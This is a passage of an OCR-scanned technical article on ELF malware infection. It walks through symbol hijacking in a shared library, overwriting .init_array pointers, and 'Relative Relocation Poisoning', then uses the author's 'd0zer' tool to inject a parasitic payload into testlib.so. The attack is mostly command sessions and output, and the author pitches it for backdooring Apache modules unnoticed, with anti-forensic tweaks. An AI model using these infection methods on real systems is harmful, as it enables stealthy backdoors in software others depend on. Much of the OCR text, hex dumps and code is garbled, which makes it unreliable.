gb be e8 14 ff ff fF 
111c: 90 
111d: Sd 
11ile: c3 


000000000000111f <func2>: 
411: 
1120: 89 eS 
4723: 8d 05 e4 Oe 00 00 
112a-: 89 c7 
112d: fe fe ff ff 
1732: 
1133: 
1134: 


# 2000 <_fini+Oxec8> 


# 200e <_fini+Oxed6> 


From here, all we need to do is modify the symbol value of func to that of func2 with r2, but first, we have to locate 
the .dsymtab section. Running ‘readelf -S testlib.so’ will print out our section header table. From there, we can use 


the address field in the output to help us locate it in r2 for patching. 


ish-5.1$ readelf -S testlib.so 
There are 28 section headers, starting at offset 0x33a8- 


Section Headers: 

[Nr] Name Type Address Offset 
Size EntSize Flags Link Info Align 

0] NULL 0000000000000000 00000000 
0000000000000000 0000000000000000 0 0 0 

1] .note.gnu.pr[...] NOTE 00000000000002a8 900002a8 
QO00000000000030 OO00000000000000 A 0 0 8 

2] -note.gnu.bu[...] NOTE 00000000000002d8 000002d8 
QO00000000000024 DOD0000000000000 A 0 0 4 

3] -gnu-hash GNU_HASH 0000000000000300 00000300 


AAAAAAAAAAAAAADS AAAAAAAAAAAAAAAL A A mn Rg 


4] .dynsym DYNSYM 0000000000000328 00000328 
00000000000000cO OOH0000000000018 A 5 1 


Entry #4 is the section header table entry for the .dynsym in previous graphic. We can seek to this address in ‘r2° 


sh-5.1$ radare2 -w testlib.so 
Cannot determine entrypoint, using 0x00001040 
run r2 with -e bin.cache=true to fix relocations in disassembly 
-- Change the UID of the debugged process with child.uid (requires root) 
s 0x00000328 


px 


Above we can see the hex-dump of .dynsym. If you look at offset line OxO00003b8 then 9 bytes over you will see 
a familiar address “091 1000000000000” that’s the little endian version of the func1 symbol value and address of 

func1. This is our target. Below is the structure of each symbol if you are curious as to what the other fields in the 
hex-dump might be. 


elf64_sym { 


El1f64_ Word st_name; * Symbol name, index in string tbl 
st_info; * Type and binding attributes 
st_other; * No defined meaning, 

E1lf64 Half st_shndx; Associated section inde 

E1lf64 Addr st_value; alue of the symbol 

Elf64 Xword st_size; Associated symbol size 

} Elf64_Sym; 


Continuing with our exercise, we successfully seek to the start of the address we want to overwrite. Then modify the 
value there with the func2 symbol value, exit, and rerun the main application. 


6d6f 
5f64 6 


s.func2.li 
6 GLIBC 2 


V 0x0000111F 


7 6d6f 
5f64 657 
F ¢ c 


This is func2 
Pi 


We have successfully redirected execution to func2 via symbol hijacking. 


Considering our target binaries could have been part of a large software suite (Apache HTTP Server for example), 
where we hijack request handling functionality to insert our logic, we could insert code that searches the HTTP 
request for a magic number identifying a “client” who wants to access the backdoor functionality. Such an infection 
would allow us to blend in with regular HTTP traffic via one of Apache’s trusted modules. In many cases, the system 
admin and network analyst would likely be no wiser. However, the limitation of this approach is that we would need 
an ELF binary to call the function linked to the exported and hijacked symbol. So let us look at how we can get code 
execution simply by having an ELF binary run when linked against an infected shared object. 


To demonstrate this technique, we’ll first target a dynamically linked library on a “dummy” program: 


ctors.c 
compile: 


*/ 


#include<stdio.h> 
__attribute_ ((constructor)) void msg(int argc, char x*argv) { 
printf(“hello from msg() constructor\n 


—attribute__((constructor) ) id second() { 


printf(“hello from second() constructor\n”) ; 


} 


void not_called() { 
puts(“I should have never been called\n”) ; 
} 


int main() { 
puts(“hello from main -- hopefully all constructors were called.\n”); 
return @; 


This program is simple; it has two functions with constructor attributes. The constructor attribute will cause the 
defined functions labeled with them to execute before the *main* function in the order they are defined. Finally, there 
is a *not_called* function that should not be reached/executed under normal circumstances. Our dummy program 
will be called “ctors” and the associated source file “ctors.c”. Compilation instructions are in the comments in the 
source code. Executing the resulting binary yields the expected results: 


[sadOp@Arch-Deliberate experimental]$ ./ctors 

hello from msg() constructor 

hello from second() constructor 

hello from main -- hopefully all constructors were called. 


[sadOp@Arch-Deliberate experimental ]$ 


Using the ‘nn’ command (list symbols in our binary) and piping the output to ‘grep’ to look for our ‘msg function will 
yield its position in our program. We then disassemble the binary with ‘objdump to verify the location by 
disassembling the binary along with the function. 


[sadOp@Arch-Deliberate experimental]$ nm ctors | grep msg 
10000000000001139 T msg 
[sad@p@Arch-Deliberate experimental]$ objdump -d ctors | grep 1139 -A 20 
(0000000000001139 <msg>: 

1139: push %rbp 

113a: 89 e5 mov %rsp,%rbp 

275 = 83 ec sub $0x10,%rsp 

1141: 7d fc mov %edi, -Ox4(%rbp) 

1144: 89 75 mov %rsi, -Ox10(%rbp) 

1148: 8d 05 Oe 00 00 lea Oxeb9(%rip) ,%rax # 2008 <_I0_stdin_used+0x8> 

114f: 89 c7 mov %rax,%rdi 

1152: d9 fe ff call 1030 <puts@plt> 

1157: nop 

1158: leave 

1159: ret 


1000000000000115a <second>: 
115a: 55 push %rbp 
115b: 48 89 e5 mov %rsp,%rbp 
115e: 48 8d 05 c3 Ge 00 00 = lea_-—s Oxec3(%rip) ,%rax # 2028 <_I0 stdin_used+0x28> 
1165: 48 89 c7 mov %rax,%rdi 
1168: e8 c3 fe ff ff call 1030 <puts@plt> 
116d: 90 nop 
116e: Sd pop %rbp 
116f: 3 ret 
[sadOp@Arch-Deliberate experimental]$ 


Historically the ELF and ABI (Application Binary Interface) standards handled the execution of constructor routines 
in the *.ctors* and *.init* sections of the binary. However, in later versions of the standard, the mechanism involving 

* init* and *.ctors* for constructor execution was replaced with *.init_array* and *dynamic tag* entry DT_INIT_-ARRAY 
(dynamic tag entries are part of the dynamic segment and utilized by dynamic linker/loader for binaries that are 
dynamically linked). This array consists of entries of function pointers, each pointing to a constructor routine that will 
execute before *the main* function. We can see the entries with ‘objdump’ again: 


[sad@p@Arch-Deliberate experimental]$ objdump -D ctors | grep .init_array -A 15 
Disassembly of section -init_array: 


OO000000000O3dcO <.init_array>: 

3dc0: 30 11 %dL, (%rcx) 
3dc2: 00 00 %al, (%rax) 
3dc4: 00 00 %al, (%rax) 
3dc6: 00 00 %al, (%rax) 
3dc8: 39 11 %edx, (%rcx) 
3dca: 00 00 %al, (%rax) 
3dcc: 00 00 %al, (%rax) 
3dce: 00 00 %al, (%rax) 
3dd0: Sa %rdx 

3dd1- 11 00 %eax, (%rax) 
3dd3: 00 0 %al, (%rax) 
3dd5: 00 00 %al, (%rax) 


Disassembly of section .fini_array: 
[sad@p@Arch-Deliberate experimental ]$ 


Disregard the “disassembly” portion as *.init_array* does not hold instructions, but the “-D” flag in objdump will 
cause all sections to disassemble regardless. Instead, focus on the hex opcode output; you will see “39 11” at offset 
Ox3dc8; the same value we obtained from the ‘nm output for the ‘msg function and constructor but in ‘little-endiarn” 
byte order. Let us overwrite one of these function pointers with the offset for our *not_called* function. 


Load the binary in ‘r2 in write mode (-w) and *analyze all* flag (-A). 


[sad@p@Arch-Deliberate experimental]$ r2 -Aw ctors 
run r2 with -e bin.cache=true to fix relocations in disassembly 
Analyze all flags starting with sym. and entry (aa) 
Analyze all functions arguments/locals (afva@@@F) 
Analyze function calls (aac) 
Analyze len bytes of instructions for references (aar) 
Finding and parsing C++ vtables (avrr) 
Type matching analysis for all functions (aaft) 
Propagate noreturn information (aanr) 
Use -AA or aaaa to perform additional experimental analysis 

- You can debug a program from the graph view (‘ag’) using standard radare2 commands 


Get the address (use ‘vaddr field since ‘r2’ emulates loading the binary in memory) of the *.init_array* section. 


vaddr vsize perm name 


0x00000000 
0x00000318 
0x00000338 
0x00000378 
0x0000039c 
0x000003c0 
0x000003e0 
0x00000488 
0x00000516 
0x00000528 
0x00000558 
0x00000648 
0x00001000 
0x00001020 
0x00001040 
0x000011a0 
0x00002000 
0x000020ac 
0x000020e8 
0x00002dc0 
0x00002dd8 
0x00002de0 
0x00002FcO 
0x00002fe8 
0x00003008 
0x00003018 
0x00003018 
0x00003038 
0x000032c0 
0x000033fd 


0x00000000 
0x00000318 
0x00000338 
0x00000378 
0x0000039c 
0x000003c0 
0x000003e0 
0x00000488 
0x00000516 
0x00000528 
0x00000558 
0x00000648 
0x00001000 
0x00001020 
0x00001040 
0x000011a0 
0x00002000 
0x000020ac 
0x000020e8 
0x00003dc0 
0x00003dd8 
0x00003de0 
0x00003FcO 
0x00003fe8 
0x00004008 
0x00004018 
0x00000000 
0x00000000 
0x00000000 
0x00000000 


-interp 
-hote.gnu.property 
-note.gnu.build-id 
-note.ABI-tag 
.gnu.hash 
.dynsym 
.dynstr 
-gnhu.version 
-gnhu.version_r 
.rela.dyn 
-rela_plt 
-init 
-plt 

- text 
Fini 
.rodata 
.eh_frame_hdr 
.eh frame 
-init_arra 
.fini_array 
. dynamic 
-got 
-got.plt 
.data 

_bss 
comment 
-symtab 
-strtab 
.shstrtab 


We then seek to it and print out the hex dump to verify we are where we need to be. 


s 0x00003dc0 
px 


11 11 
11 e010 


10 
aQi1 
c03 
18 
d8 
08 
c003 
8804 
1010] 


We then retrieve the offset of the *not_called* function and write the offset in little-endian byte order. Finally, we rerun 
the binary to see if we successfully got the *not_called* function to run. 


) c8 is ~not_called 
1 @x00001170 0x@0001170 GLOBAL FUNC 22 not_called 
0x70110000 


18 

8 
c003 
8804 
e003 
Bdoo | 
180) 

MI I | 


e83T | 


Tilergarennetiheraes experimental]$ ./ctors 

hello from msg() constructor 

hello from second() constructor 

hello from main -- hopefully all constructors were called. 


Interestingly enough, not only did the *not_called* function not execute, but our *msg* function and constructor 


d GEF (GDB Enhancement 


executed despite overwriting the ent 
Features) plugin. 


We can analyze what is happening 


[sad@p@Arch-Deliberate experimental]$ gdb ctors 


Copyright (C) 2023 Free Software Foundation, Inc. 
License GPLv3+: GNU GPL version 3 or later <htt I fe) 
This is free software: you are free to change and Neat cEribute Ete 
There is NO WARRANTY, to the extent permitted by Law. 

Type "show copying" and "show warranty" for details. 

This GDB was configured as "x86_64-pc-Linux-gnu" 

Type "show configuration" for configuration details. 

For bug reporting instructions, please see: 


WW ore Jjare »/ DUC 2 
Find the GDB manual and other documentation resources online at: 


<ntt AWW . G Ttware/gabd/do entatl he 


For help, type "help" 
"word"... 


Type "apropos word" to search for commands related to 
GEF for linux ready, type 
90 commands loaded and 5 
Reading symbols from ct 


to start, 
functions added for GDB 


to configure 
in 0.01ms using Python engine 


This GDB richer auto-downloading debuginfo from the following URLs: 


orq> 


Debuginfod has been disabled. 

To make this setting permanent, add 

(No debugging symbols found in ct 
break _start 

Breakpoint 1 at 


"set debuginfod enabled off' to 


.gdbinit. 


From here, we run the binary where execution will halt at our breakpoint, allowing us to grab the virtual address of 
* init_array* by issuing the *maintenance info sections* command to ‘gdb. 


gef® maintenance info sections 
Exec file: 
0x555555554318->0x555555554334 at 0x00000318 
0x555555554378->0x55555555439c at 0x00000378 
0x5555555543c0->0x5555555543dc at 0x000003c0 


@x555555554488->0x555555554515 at 0x00000488 
@x555555554516->0x555555554524 at 0x00000516 


0x555555555000->0x55555555501b at 0x00001000 


0x555555555040->0x5555555551a0 at 0x00001040 


0x555555557dc0->0x555555557dd8 at_Ox00002dc 


0x00000000->0x0000001b at 0x00003018-: 


We take the start address and add 8 (the entr 


*/home/sad0p/go/src/github.com/dOzer/experimental/ctors', 
-interp ALLOC LOAD READONLY DATA HAS_CONTENTS 
0x555555554338->0x555555554378 at 0x00000338: 


0x55555555439c->0x5555555543be at 0x0000039c: 


0x5555555543e0->0x555555554488 at 0x000003e0: 


@x555555554528->0x555555554558 at 0x00000528: 
0x555555554558->0x555555554648 at 0x00000558: 
x555555554648->0x555555554660 at 0x00000648: 


©x555555555020->0x555555555040 at 0x00001020: 


0x5555555551a0->0x5555555551ad at 0x000011a0-: 
0x555555556000->0x5555555560ac at 0x00002000: 
0x5555555560ac->0x5555555560e8 at 0x000020ac: 
0x5555555560e8->0x5555555561c4 at 0x000020e8- 


0x555555557dd8->0x555555557deO at @x00002dd8 
0x555555557deO->0x555555557fcO at Ox00002de0: 
0x555555557fcO->0x555555557fe8 at Ox00002FcO: 
0x555555557fe8->0x555555558008 at Ox00002fe8: 
0x555555558008->0x555555558018 at 0x00003008: 
@x555555558018->0x555555558020 at 0x00003018 
-comment READONLY HAS_CONTENTS 


file type elf64-x86-64 


note.gnu_property ALLOC LOAD READONLY DATA HAS_CONTENTS 
note.gnu.build-id ALLOC LOAD READONLY DATA HAS_CONTENTS 


-hote.ABI-tag ALLOC LOAD READONLY DATA HAS_CONTENTS 


gnu.hash ALLOC LOAD READONLY DATA HAS_CONTENTS 
dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS 
dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS 


-gnu.version ALLOC LOAD READONLY DATA HAS_CONTENTS 
-gnu.version_r ALLOC LOAD READONLY DATA HAS_CONTENTS 


rela.dyn ALLOC LOAD READONLY DATA HAS_CONTENTS 
rela_plt ALLOC LOAD READONLY DATA HAS_CONTENTS 
init ALLOC LOAD READONLY CODE HAS_CONTENTS 


-plt ALLOC LOAD READONLY CODE HAS_CONTENTS 


text ALLOC LOAD READONLY CODE HAS_CONTENTS 
fini ALLOC LOAD READONLY CODE HAS_CONTENTS 
rodata ALLOC LOAD READONLY DATA HAS_CONTENTS 


-eh_frame_hdr ALLOC LOAD READONLY DATA HAS_CONTENTS 
.eh frame ALLOC LOAD READONLY DATA HAS CONTENTS 


init_array ALLOC LOAD DATA HAS CONTENTS 


.fini_array ALLOC LOAD DATA HAS_CONTENTS 
-dynamic ALLOC LOAD DATA HAS_CONTENTS 
-got ALLOC LOAD DATA HAS_CONTENTS 
-got.plt ALLOC LOAD DATA HAS_CONTENTS 


data ALLOC LOAD DATA HAS_CONTENTS 
bss ALLOC 


nterest is 8 bytes away from the start of *.init_array” if you recall 


from our ‘r2’ session). We then set a watch point for any writes occurring at the entry and continue execution. 


jef watch *(long *)0x555555557dc8 
Hardware watchpoint 2: *(long *)0x555555557dc8 
get r 
Starting program: 
Failed to find objfile or not a valid file format: [Errno 2] No such file or directory: ‘system-supplied DSO at Ox7ffff7fc8000 


Hardware watchpoint 2: *(long *)0x555555557dc8 
Old value = 0x1170 1 
New value = Ax5555555551 29 


in () from 


[ Legend: 


Ox007fFFFTFFef40 
— 0xo9000090000000000 
Ox007fFFF7Fca000 0x03010102464c457f 


> Ox007FFFF7FFdabO 


Th ty et te te te a tt 


: Ox1 
: OxO07fFfFF7FFe2cO 
: 0x0 


{ 


J 


: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification] 
: 0x33 > @x2b : 0x00 : 0x00 : 0x00 : 0x00 


+0x0000: OxO07ffff7ffef40 — 

+0x0008: Ox007ffFF7dda4a8 — Ox00007ddeG0030001 
+0x0010: => = 
+0x0018: 6x6006000000000000 

+0x0020: 6x0G00000000000000 

+0x0028: — 0x00000000000040 ("@"?) 
+0x0030: Ox007ffFF7ddb238 — 6x00000000001d7bc8 
+0x0038: OxOO7ffFF7ddae48 — 0x00000000001d6e68 


Ox7ffFF7Fd8b72 Ox7fFFF7Fd8b48 
Ox7ffff7Fd8b74 £10, QWORD PTR [r11+0x1e8] 
Ox7fffF7Fd8b7b r10, r10 

Ox7fFFF7Fd8b7e Ox7FFFF7Fd9630 
Ox7fFFF7Fd8b84 rax, QWORD PTR [r10+0x8] 


#0] Id 1, Name: "ctors", in (), reason: 


Ox7FFFF7TFd8b6F 
Ox7ffFF7Fe8121 
Ox7ffFF7Fe4903 
Ox7 FFF F7Fe607c 
Ox7fffF7fe4ed8 


The resulting output has 3 pieces of information highlighted and labeled 1-3 of interest. At label 1 we can see the 
value changed from 0x1170 (offset of *non_called* function) to 0x555555555139. Label 2 tells us execution halt- 

ed in *Id-linux-x86-65.so.2*, which is the dynamic/runtime linker and loader. Label 3 highlights the instruction that 
triggered the watch-point resulting in the halt of execution. The value in the *rdx* register is copied via the *mov* 
instruction to the memory address held in *rcx*. The values 0x00555555555139 and 0x00555555557dc8 are *rdx* 
and *rcx* respectively. GEF detected and deference the function pointer in *rcx*, resulting in the symbol *msg”, 
which is our msg function and constructor. Further confirmation is done by issues *info symbol <addr>* in ‘gdb’ and 
disassembling the function. 


gef® info symbol 0x00555555555139 
msg in section .text of /home/sad0p/go/src/github.com/d@zer/experimental/ctors 
gef™ disas msg 
Dump of assembler code for function 
<+0>: 
<+1>: 
<+4>: - 
<+8>: : DWORD PTR [ 
<+11>: QWORD PTR [ 
<+15>: - -L + 
<+22>: 
<+25>: 
<+30>: 
<+31>: 
<+32>: 
End of assembler dump 
geft> 


From this analysis, we can conclude that whatever offsets are in *.init_array* will be overwritten at runtime. Secondly, 
overwriting the offsets in *.init_array* occurs in the dynamic/runtime linker and loader code. Earlier, we mentioned 
shared objects undergo mapping into the processes address space. The dynamic/runtime linker and loader is no 
exception. After the kernel creates the process’s image, it places information into memory for the process (the stack 
region specifically) in structures called auxiliary vectors and transfers execution to the dynamic/runtime linker and 
loader. It (dynamic/runtime linker and loader) will then use this information to further populate the process image 
with the required code and data necessary for successful execution. 


One of the critical tasks the dynamic linker performs (especially in PIE binaries) is to carry out relocations, mean- 
ing to carry out calculations based on the data in relocation records and sometimes at specific locations (in the 
case of REL relocation structures which utilize implicit addends), then patching the binary in memory (sometimes 
called “hot-patching”). As you can imagine, this is important on systems that utilize ASLR (Address Space Layout 
Randomization) as the base address (memory address where the binary undergoes mapping/loading at runtime) is 
unknown by the compiler and link editor (Id) as well as shared objects, which have to be position independent and 
rely on the dynamic linker to “resolve” offsets to absolute addresses (using the program’s base address) when other 
binaries link against the shared object. 


To deal with this behavior, we need to better understand Relative Relocations, one of the dynamic linker’s many re- 
location types. You can view the relocation activity printed by the dynamic linker in the following screenshot. You will 
observe the dynamic/runtime linker and loader following the LD_DEBUG flag and printing out the requested informa- 
tion about the execution of the program long before execution reaches any constructor: 


[sadOp@Arch-Deliberate experimental]$ LD _DEBUG=reloc,statistics - 
50386: 
50386: relocation processing: /usr/lib/libc.so.6 
50386: 
50386: relocation processing: -/ctors (lazy) 
50386: 
50386: relocation processing: /1ib64/1d-lLinux-x86-64.so.2 
50386: 
50386: runtime linker statistics: 
50386: total startup time in dynamic loader: 210923 cycles 
50386: time needed for relocation: 61941 cycles (29.3%) 
50386: number of relocations: 94 
50386: number of relocations from cache: 7 
50386: number of relative relocations: 5 
50386: time needed to load objects: 68689 cycles (32.5%) 
50386: 
50386: calling init: /1ib64/1d-lLinux-x86-64.so.2 
50386: 
50386: 
50386: calling init: /usr/lib/libc.so.6 
50386: 
50386: 
50386: initialize program: -/ctors 
50386: 
hello from msg() constructor 
hello from second() constructor 
50386: 
50386: transferring control: -/ctors 
50386: 
hello from main -- hopefully all constructors were called. 


50386: 

50386: calling fini: [0] 

50386: 

50386: 

50386: calling fini: /usr/lib/libc.so.6 [0] 

50386: 

50386: 

50386: calling fini: /11b64/1d-lLinux-x86-64.so.2 [0] 

50386: 

50386: 

50386: runtime Linker statistics: 

50386: final number of relocations: 95 

50386: final number of relocations from cache: 7 
[sad@p@Arch-Deliberate experimentaL]$ 


Now we can look at the relocation entries to demystify what is happening with *.init_array*. In the following screen- 
shot, the first five relocation entries are of interest (Relative Relocations) and are of type *R_X86_64_RELATIVE*. The 
last column lists some values that are part of the addend. The addend with the value 0x1139 is the offset for our 


msg function and constructor. On the same row, to the left (in the offset column), we see a virtual offset (Ox3dc8) 
where we could expect the relocation to occur at runtime: 


[sad@p@Arch-Deliberate experimental]$ readelf -r ctors 


Relocation section '.rela.dyn' at offset 0x558 contains 10 entries: 
Offset Info Type Sym. Value Sym. Name + Addend 
000000003dcO 000000000008 R_X86_64_RELATIVE 1130 
0OO000003dc8 O00000O00008 R_X86_64 RELATIVE 1139 
000000003ddd O00O00000008 R_X86_64_ RELATIVE 115a 
(00000003dd8 000000000008 R_X86_64 RELATIVE 10e0 
000000000008 R_X86_64 RELATIVE 4010 
000100000006 R_X86_64 GLOB DAT 0000000000000000 __libc_start_main@GLIBC_2.34 + 0 
000200000006 R_X86_64 GLOB DAT 0900000000000000 ITM deregisterTM[...] + 0 
000409000006 R_X86_64 GLOB DAT 0000000000000000 _ gmon_start_ + 0 
900500000006 R_X86_64 GLOB DAT 0000000000000000 _ITM registerTMCL[...] + 0 
000000003feO O00600000006 R_X86_64 GLOB DAT 0000000000000000 _ cxa_finalize@GLIBC_2.2.5 + 0 
Relocation section '.rela.plt' at offset 0x648 contains 1 entry: 
Offset Info Type Sym. Value Sym. Name + Addend 
000000004000 000300000007 R_X86_64 JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0 
[sad@p@Arch-Deliberate experimental ]$ 


The calculation for R_X86_64_RELATIVE is B + A; the binary address mapped at runtime (B) plus the addend field 
value (A). The results of the calculation are written into memory at the specified virtual offset (0x000000003dc8, 
which is within the defined memory region for *.init_array* section) by the dynamic linker. So if we alter the addend 
field of the relocation record for msg function with the offset for *not_called* then we can have the dynamic linker 
execute *not_called”* as it was a constructor. Included below is the relocation structure. Note that IA-64 architecture 
utilizes explicit addends (meaning there is a field in the structure allocated for the addend) and uses relocation 
structures of type RELA. Here’s an example of a RELA relocation structure: 


typedef struct elf64_rela { 
E1f64 Addr r_offset; 
E1f64_Xword r_info; 


E1#64_Sxword r_addend; 


} E1f64_Rela; 


Let us attempt to modify the relocation entry for msg function and constructor to execute our *not_called* function. 
We can start by re-loading the binary into ‘r2”, and locating the rela.dyn section, seeking to the start of the section 
and reading the hex-dump output of entries: 


[sad@p@Arch-Deliberate experimental]$ r2 -Aw ctors 
run r2 with -e bin.cache=true to fix relocations in disassembly 
Analyze all flags starting with sym. and entryO (aa) 
Analyze all functions arguments/locals (afva@@@F) 
Analyze function calls (aac) 
Analyze len bytes of instructions for references (aar) 
Finding and parsing C++ vtables (avrr) 
Type matching analysis for all functions (aaft) 
Propagate noreturn information (aanr) 
Use -AA or aaaa to perform additional experimental analysis 
-- Calculate current basic block checksum with the ph command (ph md5S, ph crc32, 
is 
[Sections] 


size vaddr vsize 


nth paddr 


type 


WONAUBRWNe © 


0x00000000 
0x90000318 
0x00000338 
0x00000378 
0x9000039c 
0x000003c0 
0x006003e0 
0x00000488 
0x00000516 
0x00000528 
0x00000558 
0x00000648 
0x00001000 
8x00001020 
0x00001040 
0x000011a0 
0x00002000 
0x000020ac 
0x006020e8 
0x00002dc0 
0x00002dd8 
0x00602de0 
@x00002FcO 
0x00002fe8 
0x00003008 
0x00003018 
0x00003018 
0x00003038 
0x000032c0 
0x000033fd 


®x0 0x00000000 
Ox1ic 0x00000318 
0x40 0x00000338 
0x24 0x00000378 
0x20 0x0000039c 
Oxic 0x000003c0 
Oxa8 O0x000003e0 
Ox8d 0x00000488 

Oxe 0x00000516 
0x30 0x00000528 
OxfO 0x00000558 
0x18 0x00000648 
Ox1ib 0x00001000 
0x20 0x00001020 
@x160 0x00001040 

Oxd 0x000011a0 
Oxac 0x00002000 
Ox3c O0x000020ac 
Oxdc 0x000020e8 
0x18 0x00003dc0 

Ox8 0x00003dd8 
O@x1e0 0xO00003de0 
0x28 0x00003fcO 
0x20 0x00003fe8 
0x10 0x06004008 

®xO 0x00004018 
Ox1ib 0x00000000 
0x288 0x00000000 
@x1i3d 0x08000000 
Qx116 0x68000000 


0x00000558 


0x0 
Oxic 
0x40 
0x24 
0x20 
Oxic 
0xa8 
0x8d 
Oxe 
0x30 
OxfO 
0x18 
0x1ib 
0x20 
0x160 
Oxd 
Oxac 
Ox3c 
Oxdc 
0x18 
0x8 
Ox1e0 
0x28 
0x20 
0x10 
0x8 
Ox1ib 
0x288 
Ox13d 
0x116 


NULL 
PROGBITS 
NOTE 

NOTE 

NOTE 
GNU_HASH 
DYNSYM 
STRTAB 
GNU_VERSYM 
GNU_VERNEED 
RELA 

RELA 
PROGBITS 
PROGBITS 
PROGBITS 
PROGBITS 
PROGBITS 
PROGBITS 
PROGBITS 
INIT_ARRAY 
FINI_ARRAY 
DYNAMIC 
PROGBITS 
PROGBITS 
PROGBITS 
NOBITS 
PROGBITS 
SYMTAB 
STRTAB 
STRTAB 


-interp 
-hote.gnu. property 
-note.gnu.build-id 
-note.ABI-tag 
-gnu.hash 
.dynsyn 
.dynstr 
-gnu.version 
-ghu.version_r 
.rela.dyn 
-rela.plt 
-init 

-plt 

. text 

. Fini 

.rodata 
.eh_frame_hdr 
.eh_frame 
-init_array 

. fini_array 

. dynamic 

-got 

.got.plt 

.data 

.bss 

- comment 
.symtab 
-strtab 
.shstrtab 


Each entry is 24 bytes, so we seek 24 bytes to get past the first entry and an additional 16 bytes to arrive at the 
addend field: 


px 


11 
08 
d8 
e010 
08 
cO3t 


06 
do: 


Then write the offset of the *not_called* function into the addend field: 


wx 7011000000000000 


Our binary executes and yields the expected results. 


[sad@p@Arch-Deliberate experimental]$ ./ctors 
I should have never been called 


hello from second() constructor 


hello from main -- hopefully all constructors were called. 


[sad@p@Arch-Deliberate experimental]$ 


We now have a viable proof of concept for executing parasitic code without modifying the entry point but instead 
altering relocation records to make the dynamic/runtime linker and loader do our handy work. | call this process 
Relative Relocation Poisoning/Hijacking. We can now target any ELF binary utilizing relative relocations, including 
standard executables and libraries (shared objects). So binary infection methods such as *PT_NOTE* to *PT_LOAD* 
and *Text Segment Padding’, once used to target standard ELF executables, can now be applied to ELF shared 
objects executables. Any ELF binary linked against an infected shared library would then have parasitic code 
executed within the execution context of the binary. 


We can demonstrate full infection using ‘dOzer’, a program | first wrote to inject standard ELF executables with 
arbitrary payloads using *Text Segment Padding Algorithm’. It has since then been augmented to support 
*PT_NOTE* to *PT_LOAD* with Relative Relocation Hijacking/Poisoning in shared objects and standard executable 
that employ relative relocations. The following example will utilize the *testlib.so* and *main* ELF binaries we 
compiled earlier. First, recompile the “testlib.so* binary with the instructions from earlier in the article, because the 
binary underwent modification with our symbol hijacking exercise. Then execute the *main program* (assuming it is 
still in the same directory from the earlier example) to view the output. 


[sad@p@Arch-Deliberate testlib2]$ gcc -c testlib.c -o testlib.o -fPIC 
[sad@p@Arch-Deliberate testlib2]$ gcc -shared testlib.o -o testlib.so 
[sad@p@Arch-Deliberate testlib2]$ -/main 


This is funci 
[sad@p@Arch-Deliberate testlib2]$ 


Now, ‘dOzer contains a default payload that prints “hello world — this is a non payload” for testing purposes; we will 
use it for this example. The following screenshot shows ‘dOzer carrying out the *PT_NOTE* to *PT_LOAD* infection 
algorithm, then locating the dynamic segment to find where relocation entries are stored, iterating over the records 
to find a suitable entry (word on this later) and hijacking/poisoning the relocation record’s addend field to point to our 
parasitic code and making sure the corresponding *.init_array* entry matches on disk. Making sure the relocation 
record’s addend and .init_array share the same value is essential from an anti-detection or anti-forensics standpoint. 
Even though *.init_array* contents on disk are useless, we want them to appear as if the compiler and link editor 
produced the entirety of the binary. Worth noting that ‘dOzer does not overwrite the original binary but creates an 
infected copy suffixed with “-infected,” so you will need to replace the legitimate file with the infected one before 
running the *main* program: 


sadOp@Arch-Deliberate testlib2]$ ../../d0zer -ctorsHijack -infectionAlgo PtNoteToPtLoad -debug -target testlib.so 
PT_NOTE segment pHeader index @ 6 
] Converting PT_NOTE to PT_LOAD and setting PERM R-X 
+] Newly created PT_LOAD virtual address starts at 0xc003aa8 
+] CtorsHijack requested. Locating and reading Dynamic Segment 
+] 24 entries in Dynamic Segment 
+] Located DT_RELA @ 0x0000000000000498 
DT_RELA has 24 entries 
File offset of relocations @ 0x0000000000000498 
Found viable relocation record hooking/poisoning 
offset: 0x0000000000003df8 
type: R_X86_64 RELATIVE 
Addend: 0x0000000000001100 
offset 0x0000000000002df8 updated with value (Addend) 000000000c003aa8 
PAYLOAD 
53 52 41 53 | TPQSRVWUAPAQARAS | 
55 41 00 68 |ATAUAVAW...+..-h] 
6f 20 73 20 |ello -- this is | 
6f 6e 69 76 |a non destructiv| 
00 bf |e payload 
49 ‘4e |||. 
Se 5a |A 
2d a8 
24 «3 


[+] Increased Phdr.Filesz by length of payload (0x90) 

[+] Increased Phdr-Memsz by length of payload (0x90) 

[+] Increased section header offset from 0x3318 to 0x33a8 to account for payload 
[sad@p@Arch-Deliberate testlib2]$ mv testlib.so-infected testlib.so 
[sad@p@Arch-Deliberate testlib2]$ ./main 

hello -- this is a non destructive payloadThis is funci 

[sad@p@Arch-Deliberate testlib2]$ 


We can also demonstrate “Text Segment Padding’ after recompiling *testlib.so* and replacing the legitimate shared 
object with the infected version that ‘dOzer produces. 


[sadOp@Arch-Deliberate testlib2]$ gcc -c testlib.c -o testlib.o -fPIC 
[sadOp@Arch-Deliberate testlib2]$ gcc -shared testlib.o -o testlib.so 
sad@p@Arch-Deltberate testlib2]$ ../../d@zer -ctorsHijack -infectionAlgo TextSegmentPadding -debug -target testltb.so 
CtorsHijack requested. Locating and reading Dynamic Segment 
24 entries in Dynamic Segment 
Located DT_RELA @ 0x0000000000000498 
DT_RELA has 24 entries 
File offset of relocations @ 0x0000000000000498 
Found viable relocation record hooking/poisoning 
offset: 0x0000000000003df8 
type: R_X86_64_RELATIVE 
Addend: 0x0000000600001100 
offset 0x0000000000002df8 updated with value (Addend) 0900000000001145 
Text segment starts @ 0x1000 
Text segment ends @ 0x1145 
Payload size pre-epilogue Ox5c 
Appended default restoration stub 
Generated and appended position independent return 2 OEP stub to payload 
Payload size post-epilogue 
----PAYLOAD 
53 | TPQSRVWUAPAQARAS | 
55 |ATAUAVAW. ..+..-h] 
Jello -- this is | 
Ja non destructiv| 
le payload 
AAS 
JAJA\ALAZAYAX]_42| 
ILYX\....-H.-yH-E| 
[|ectibcoosodis 5]| 


Increased text segment p_filesz and p_memsz by 144 (length of payload) 
Adjusting segments after text segment file offsets by 0x1000 
Inceasing pHeader @ index 2 by 0x1000 
Inceasing pHeader @ index 3 by 0x1000 
Inceasing pHeader @ index 4 by 0x1000 
Inceasing pHeader @ index 8 by 0x1060 
Inceasing pHeader @ index 10 by 0x1000 
Increasing section header addresses if they come after text segment 
Extending section header entry for text section by payload len. 
(14) Updating sections past text section @ addr 0x2000 
(15) Updating sections past text section @ addr Ox201c 
